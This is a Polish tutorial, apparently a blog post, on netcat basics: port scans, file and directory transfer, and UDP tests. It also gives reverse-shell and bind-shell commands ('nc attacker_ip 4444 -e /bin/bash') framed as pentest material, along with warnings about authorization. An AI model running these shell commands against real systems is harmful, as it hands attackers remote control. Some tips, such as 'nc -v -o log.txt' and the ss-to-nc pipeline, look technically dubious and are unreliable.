Nie każdy tool sieciowy musi być skomplikowany. Netcat (nc) to jedno polecenie, które robi wszystko: skanuje porty, tworzy serwery, klienci i nawet backdoory. Idealne po netstat/ss – bo czasem trzeba nie tylko patrzeć, ale działać.

Czym jest netcat?

nc to szwajcarski scyzoryk TCP/UDP. Działa na każdym Linuksie (zazwyczaj preinstalowany). Podstawowa składnia:

nc [opcje] [host] [port]

Skanowanie portów

Zamiast nmap do szybkich testów:

# Skan TCP na localhost
nc -zv localhost 22 80 443

# Timeout i verbosy
nc -v -w 3 192.168.1.1 1-1000

Proste skanowanie z netcat

Sprawdź, czy port żyje – szybciej niż pełny nmap. Prosty serwer plików

Udostępnij plik w LAN bez httpd:

# Na serwerze (nasłuchuj na 1234)
nc -l -p 1234 < plik.txt

# Na kliencie
nc serwer_ip 1234 > pobrany.txt

UWAGA: Otwarty listener = ryzyko nc bez firewall to zaproszenie dla każdego. Zawsze ogranicz -p i dodaj iptables.

Reverse shell (pentest)

Klasyk w exploitach – ofiara łączy się z Tobą:

Na atakującym (nasłuch):

nc -lvnp 4444

Na ofierze:

nc attacker_ip 4444 -e /bin/bash

Bind shell

Ofiara nasłuchuje, Ty łączysz:

Na ofierze:

nc -lvp 4444 -e /bin/bash

Zaawansowane triki Transfer katalogu

tar czf - /sciezka/ | nc -l -p 1234
nc serwer 1234 | tar xzf -

UDP testy

nc -u -v serwer 53
echo "test" | nc -u serwer 53

Netcat w skryptach

Automatyzuj z bash – loop po portach.

PRAKTYKA: Tylko na swoich maszynach Reverse/bind shells to ofensywa. Testuj tylko autoryzowane cele (np. HackTheBox).

Podsumowanie praktyczne

Netcat to nie tylko narzędzie – to sposób myślenia sieciowego: zobacz połączenie (netstat/ss) → przetestuj aktywnie (nc) → zabezpiecz (iptables). Seria “Wróćmy do podstaw” buduje Twój arsenał CLI krok po kroku:

  • netstat/ss: Co się łączy z moim systemem?
  • netcat: A co jeśli ja się połączę?
  • [następny: tcpdump]: Co konkretnie płynie po tych połączeniach?
# Twój nowy zestaw cybersec:
ss -tuln | nc -zv localhost && echo "Porty aktywne i testowane!"

Pro tip: Zapisuj wyniki do pliku (nc -v -o log.txt). Logi to 80% sukcesu w debugowaniu i audytach.

OSTATNIE SŁOWO: nc to miecz obosieczny. Na produkcji używaj z iptables -A INPUT -p tcp --dport 4444 -j DROP przed każdym listenerem.

Kolejny odcinek: tcpdump – zobaczysz, co naprawdę płynie w Twojej sieci. Zostań z nami!